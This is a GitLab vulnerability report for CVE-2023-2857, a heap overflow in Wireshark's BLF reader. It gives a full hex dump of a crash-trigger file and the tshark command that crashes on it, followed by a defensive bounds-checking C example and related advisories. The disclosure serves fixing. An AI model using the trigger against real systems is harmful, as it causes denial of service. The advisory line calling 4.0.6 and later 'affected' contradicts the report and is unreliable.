CVE-2023-2857: Heap buffer overflow vulnerability in BLF reader (#19063) · Issues · Wireshark Foundation / wireshark · GitLab

BLF file parser crash in Wireshark 4.0.0 to 4.0.5 and 3.6.0 to 3.6.13 allows denial of service via crafted capture file

Issue (open), created May 12, 2023 by Huascar Tejeda (@htejeda)

Heap buffer overflow vulnerability in BLF reader

Description:

A heap-buffer overflow vulnerability has been discovered in Wireshark’s Binary Logging Format (BLF) file processing. The vulnerability occurs in the blf_pull_logcontainer_into_memory() function in the wiretap/blf.c file. The vulnerability could be exploited by providing a maliciously crafted BLF file, which could lead to arbitrary code execution.

Tested on: Ubuntu 22.04.2 LTS

Details:

The overflow is triggered by a call to memcpy (displayed as __asan_memcpy in the ASAN output), copying 28 bytes into a memory region that is only 15 bytes large. This region was allocated in blf_pull_logcontainer_into_memory using calloc at wiretap/blf.c:499.

After the overflow, the program execution continues until it attempts to allocate memory with malloc in wmem_strdup_printf (as part of error handling), causing a crash with the message malloc(): corrupted top size.

Steps to reproduce:

$ xxd -g1 trigger
00000000: 4c 4f 47 47 30 00 00 00 30 30 30 30 30 30 30 30  LOGG0...00000000
00000010: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30  0000000000000000
00000020: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30  0000000000000000
00000030: 4c 4f 42 4a 10 00 01 00 0f 00 00 00 0a 00 00 00  LOBJ............
00000040: 02 00 30 30 30 30 30 30 30 30 30 30 30 30 30 30  ..00000000000000
00000050: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30  0000000000000000
00000060: 30 30 30 30 30 30 30 30 30 30 30 30              000000000000

$ tshark -r trigger
malloc(): corrupted top size
Aborted

For a more detailed understanding of this vulnerability, I’ve attached the following files:

  • Trigger File: This is the crafted BLF file that provokes the heap buffer overflow when processed by Wireshark.
  • ASAN Output: AddressSanitizer’s (ASAN) report provides additional insight into the memory corruption.
  • GDB Backtrace of Tshark: This backtrace reveals the call sequence leading up to the crash in Wireshark’s Tshark utility.
  • GDB Backtrace of the Fuzzer

I’d also like to request a CVE ID for this vulnerability.

Please let me know if you need any additional information or assistance in addressing this vulnerability.

Regards,

Huáscar

Attachments: trigger, ASAN.txt, GDB_Backtrace_tshark.txt, GDB_Backtrace_fuzzer.txt
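The report boils down to a file-controlled allocation size (15 bytes, via calloc) that was smaller than the fixed amount the reader then copied into it (28 bytes). The added example below is not Wireshark's code or its fix; it is a hypothetical container reader that shows the check a defender wants in front of that memcpy: validate the declared size against the fixed header length and against the bytes actually present before allocating. The 28-byte header length, the pull_container_checked() function, the status enum and the sample_container bytes are all assumptions constructed for this example; the real BLF structure layout is not shown in the issue and is not reproduced here.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical fixed header length a reader copies out of a log container.
 * 28 bytes matches the copy length in the ASAN report; the real BLF struct
 * layout is not in the issue and is not modelled here. */
#define CONTAINER_HEADER_LEN 28u

typedef enum {
    PULL_OK = 0,
    PULL_ERR_SIZE_TOO_SMALL,  /* declared size cannot hold the fixed header */
    PULL_ERR_TRUNCATED,       /* declared size exceeds the bytes actually present */
    PULL_ERR_ALLOC            /* calloc failed */
} pull_status;

/* Allocate `declared_size` bytes (the size the file claims for the container)
 * and copy the fixed header into it, but only after proving the copy fits.
 * On success *out owns a heap buffer the caller must free(). */
pull_status pull_container_checked(const uint8_t *data, size_t data_len,
                                   uint32_t declared_size,
                                   uint8_t **out, size_t *out_len)
{
    *out = NULL;
    *out_len = 0;

    /* The report's failure mode: a 15-byte allocation receiving a 28-byte
     * memcpy. A size taken from the file must be compared with the fixed
     * amount the code is about to write, before the allocation is made. */
    if (declared_size < CONTAINER_HEADER_LEN)
        return PULL_ERR_SIZE_TOO_SMALL;

    /* Also refuse a size larger than the input that is really available, so
     * a later read of the rest of the container cannot run past the data. */
    if ((size_t)declared_size > data_len)
        return PULL_ERR_TRUNCATED;

    uint8_t *buf = calloc(declared_size, 1);
    if (buf == NULL)
        return PULL_ERR_ALLOC;

    memcpy(buf, data, CONTAINER_HEADER_LEN); /* in bounds: declared_size >= 28 */
    *out = buf;
    *out_len = declared_size;
    return PULL_OK;
}

/* Constructed input: 64 bytes standing in for a container body (a magic
 * followed by zero filler). This is not the trigger file from the issue. */
static const uint8_t sample_container[64] = { 'L', 'O', 'B', 'J' };

/* Replay the numbers from the report (declared size 15, header copy of 28)
 * through the checked reader: it returns an error instead of corrupting the heap. */
pull_status demo_report_case(void)
{
    uint8_t *buf;
    size_t len;
    pull_status st = pull_container_checked(sample_container, sizeof sample_container,
                                            15, &buf, &len);
    free(buf); /* NULL on error, which free() accepts */
    return st;
}

/* A declared size that holds the header and is covered by the input succeeds;
 * returns the allocated length (40) on success, 0 on any error. */
size_t demo_valid_case(void)
{
    uint8_t *buf;
    size_t len;
    pull_status st = pull_container_checked(sample_container, sizeof sample_container,
                                            40, &buf, &len);
    free(buf);
    return st == PULL_OK ? len : 0;
}

/* A size large enough for the header but larger than the input is rejected too. */
pull_status demo_truncated_case(void)
{
    uint8_t *buf;
    size_t len;
    pull_status st = pull_container_checked(sample_container, sizeof sample_container,
                                            100, &buf, &len);
    free(buf);
    return st;
}

int main(void)
{
    printf("report case (size 15): status %d\n", demo_report_case());
    printf("valid case  (size 40): allocated %zu bytes\n", demo_valid_case());
    printf("truncated   (size 100): status %d\n", demo_truncated_case());
    return 0;
}
```

The two checks are deliberately ordered before calloc: rejecting an undersized or oversized declared length up front means the allocation size and the copy length can never disagree, which is exactly the invariant the ASAN report shows being broken.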

Related news

Gentoo Linux Security Advisory 202309-02

Gentoo Linux Security Advisory 202309-2 - Multiple vulnerabilities have been found in Wireshark, the worst of which could result in denial of service. Versions greater than or equal to 4.0.6 are affected.

Debian Security Advisory 5429-1

Debian Linux Security Advisory 5429-1 - Multiple vulnerabilities have been discovered in Wireshark, a network protocol analyzer which could result in denial of service or the execution of arbitrary code.